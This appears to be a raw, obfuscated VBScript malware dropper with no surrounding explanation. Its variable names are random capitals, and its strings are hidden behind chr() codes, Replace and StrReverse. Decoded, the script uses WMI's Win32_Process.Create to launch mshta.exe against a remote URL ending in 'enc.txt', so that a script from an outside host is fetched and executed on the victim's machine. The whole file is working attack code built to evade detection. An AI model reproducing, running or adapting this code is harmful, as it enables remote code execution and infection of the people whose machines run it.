VFCYBHNSPIDRESHTHJTDNP = Replace(":CZZGDXNVTGADHPFORGSZHD"&chr(77)&""&chr(71)&"","CZZGDXNVTGADHPFORGSZHD",""&chr(83)&""&chr(84)&"")
NIRZWSQKSRHDLGXUVGESQD = Replace(""&chr(80)&"JRQACQIIAPZVHLLGFNPUNO"&chr(78)&""&chr(73)&"","JRQACQIIAPZVHLLGFNPUNO","_"&chr(50)&""&chr(51)&"")
GRHCPZLEDTLHFGERJIDBGH = StrReverse("c"&chr(69)&""&chr(83)&"")
FKINPUGFGIOIANUTIYQGKO = ""&chr(83)&""+GRHCPZLEDTLHFGERJIDBGH+""&chr(79)&""
UVBYTAWZQEWQJEGLLRJWFE = ""&chr(78)&""+""&chr(73)&""+""&chr(87)&""
TIXEVINLVQWITPQRECHZIY = Replace(""&chr(88)&"QITDJXEEPLBYIFHVNBGCXP"&chr(72)&""&chr(83)&"","QITDJXEEPLBYIFHVNBGCXP",""&chr(69)&""&chr(46)&""&chr(65)&""&chr(84)&"")

BTVTLUWDJXXNWRFZDEFNBD = StrReverse("txt" & Chr(46) & "cne" & Chr(47) & "kp" & Chr(46) & "moc" & Chr(46) & "urugedart" & Chr(47) & "" & Chr(47) & ":ptth "&chr(69)&""+TIXEVINLVQWITPQRECHZIY+""&chr(77)&"")
set GWSPAWQZQSQTAIUKJGXLVV = GetObject(StrReverse(""+FKINPUGFGIOIANUTIYQGKO+""&chr(82)&""+NIRZWSQKSRHDLGXUVGESQD+""&chr(87)&""+VFCYBHNSPIDRESHTHJTDNP+""&chr(77)&""+UVBYTAWZQEWQJEGLLRJWFE+""))

OAGULWEDBYEIFCKQJQFAXE = GWSPAWQZQSQTAIUKJGXLVV.Create (BTVTLUWDJXXNWRFZDEFNBD,null,null,processid)